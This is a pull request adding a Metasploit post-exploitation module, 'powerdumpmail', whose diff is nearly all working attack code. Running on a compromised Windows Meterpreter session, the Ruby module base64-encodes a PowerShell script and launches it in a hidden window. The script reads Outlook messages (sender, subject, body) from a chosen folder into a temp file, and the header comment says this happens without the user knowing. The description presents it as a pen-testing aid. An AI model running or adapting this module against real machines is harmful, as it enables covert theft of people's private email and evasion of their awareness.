### PR TITLE
powerdumpmail

### DIFF
--- a/modules/post/windows/gather/powerdumpmail.rb
+++ b/modules/post/windows/gather/powerdumpmail.rb
@@ -1,0 +1,66 @@
+#
+# Meterpreter script for utilizing PowerShell to extract mails from from Outlook Express inbox witout the user knowloage
+# This script requires you to be running as system in order to work properly. This has currently been
+# tested on Windows 7, which install PowerShell by default.
+# Script and code written by: Roni Bachar(@roni_bachar)
+# for more information ronibachar.blogspot.com
+# Script version 0.0.1
+# Greets to AVNET team
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+  def initialize(info={})
+    super(update_info(info,
+        'Name'          => '[Windows] [Gather] [Powerdumpmail]',
+        'Description'   => %q{
+          Meterpreter script for utilizing PowerShell to extract mails from from Outlook Express.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Roni Bachar' ],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+    ))
+ register_options(
+      [
+        OptString.new('FOLDER', [true, 'Folder to Extract(6-Inbox,5-Sent Items,3-Deleted Items)', 6]),
+        OptString.new('COUNT', [true, 'Count of mails to extract', 10]),
+        OptString.new('FILENAME', [true, 'Filename to save in temp', 'pmail.txt'])
+
+      ], self.class)
+end
+def run
+b = datastore['FOLDER']
+c = datastore['COUNT']
+f = datastore['filename']
+buffer = <<-eos
+$outlook = new-object -com outlook.application;
+$ns = $outlook.GetNameSpace("MAPI");
+$inbox = $ns.GetDefaultFolder($olFolderInbox)
+#checks 20 newest messages
+$messages = $inbox.Items
+$msg = $messages.GetLast()
+for ($i=0;$i -le $countmail;$i++) {
+$subject = "Subject: "+$msg.Subject
+$email = "From: " +$msg.SenderEmailAddress
+$time =  $msg.CreationTime
+$body = "Message: "+ $msg.body
+$a = $email
+$b = $subject
+$c = $body
+eos
+bufend = ('$m ="----------------------------------------------------------------------"')+"\n"+('$m >>$env:temp"\\\\')+f+('"')+"\n"+("$msg = $messages.GetPrevious()")+"\n"+"}"
+buffer = ("$olFolderInbox =")+b+"\n"+("$countmail =")+c+"\n"+ buffer+('$a >>$env:temp"\\\\')+f+('"')+"\n"+('$b >>$env:temp"\\\\')+f+('"')+"\n"+('$c >>$env:temp"\\\\')+f+('"')+"\n"+bufend
+#print buffer
+buf = Rex::Text.to_unicode(buffer)
+b64 = Rex::Text.encode_base64(buf)
+print_status("Powerdumpmail v0.1 - Created By Roni Bachar(@roni_bachar)")
+print_status("Runing Powershell...")
+#print_status("powershell -wind hidden -noni -enc "+b64)
+session.sys.process.execute("cmd /c powershell -WindowStyle hidden -enc "+b64, nil, {'Hidden' => 'true', 'Channelized' => true})
+print_status ("Dumping Mails...")
+print_status ("Please wait a few minutes before downloading")
+end
+end
+
+
+


### PR DESCRIPTION
PowerDumpMail is a post module for extracting mail from Microsoft Outlook.

The Meterpreter script was developed in order to give pen testers the ability to extract sensitive information
from a controlled stations.

The script gives the user the functionality to extract all Microsoft folder like (inbox,sent items,deleted items,calendar etc...).

The Script is a combination of ruby and powershell script.

The User doesn't need to be login to an Exchange Server or that the Microsoft Outlook program will be opened.

The Meterpreter Script was tested on windows 7 Microsoft Outlook 2010
